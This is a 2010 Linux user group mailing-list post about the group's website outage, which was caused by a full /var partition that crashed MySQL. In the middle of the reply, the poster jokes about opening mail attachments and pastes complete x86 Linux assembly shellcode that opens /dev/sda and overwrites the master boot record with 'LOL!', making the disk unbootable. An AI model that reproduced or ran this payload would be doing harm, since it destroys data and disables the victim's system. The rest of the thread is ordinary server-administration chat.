Plug website down

Lisa Kachold lisakachold at obnosis.com
Sat Oct 30 13:59:11 MST 2010

On Sat, Oct 30, 2010 at 11:42 AM, Brian Cluff <brian at snaptek.com> wrote:

> Wow, after all the wild speculation on what was going on with the server,
> here's what actually happened:
>
> The hard drive on the server has a rather unfortunate partition layout and
> the /var directory is rather small and was simply filled up, so mysql
> freaked out and quit....  that's all, and it's all fixed now.
>
> A new server will to be swapped in rather soon, and we'll make sure that it
> doesn't have the same stupid partitioning on it, and we will be going to a
> new website at the same time.

Yes!  I still talk with management types who once knew a craggy old Linux
Admin who obsessed over partioning.  They are sure that since I use Volume
Management, I don't know as much!

Laugh, I tired of being paged by Nagios/Cacti to ssh in and clear a
partition because they spent more time in fdisk than they did in log rotate!

Good thing no-one's opening mail attachments or jpg's there?

; linux/x86 overwrite MBR on /dev/sda with `LOL!' 43 bytes
; root at thegibson
; 2010-01-15

section .text
        global _start

_start:
        ; open("/dev/sda", O_WRONLY);
        mov al, 5
        xor ecx, ecx
        push ecx
        push dword 0x6164732f
        push dword 0x7665642f
        mov ebx, esp
        inc ecx
        int 0x80

        ; write(fd, "LOL!"x128, 512);
        mov ebx, eax
        mov al, 4
        cdq
        push edx
        mov cl, 128
        fill:
                push dword 0x214c4f4c
        loop fill
        mov ecx, esp
        inc edx
        shl edx, 9
        int 0x80

> Brian Cluff
>

> On 10/29/2010 08:53 AM, Jordan Aberle wrote:
>
>> I have tried to visit the website last night as well as this morning but
>> there seems to be a database problem.  It is saying 'mysql: too many
>> connections' but I tried accessing the website early this morning - I
>> doubt it was getting bombarded by millions of plug members. :)
>> Any eta?
>> Thanks,
>> Jordan

Skype: 6022393392
ATT:     5037544452
GV:      6236883392
http://www.it-clowns.com
Politicians should read science fiction, not westerns and detective stories.
-Arthur C. Clark I am free because I know that I alone am morally
responsible for everything I do. -Heinlein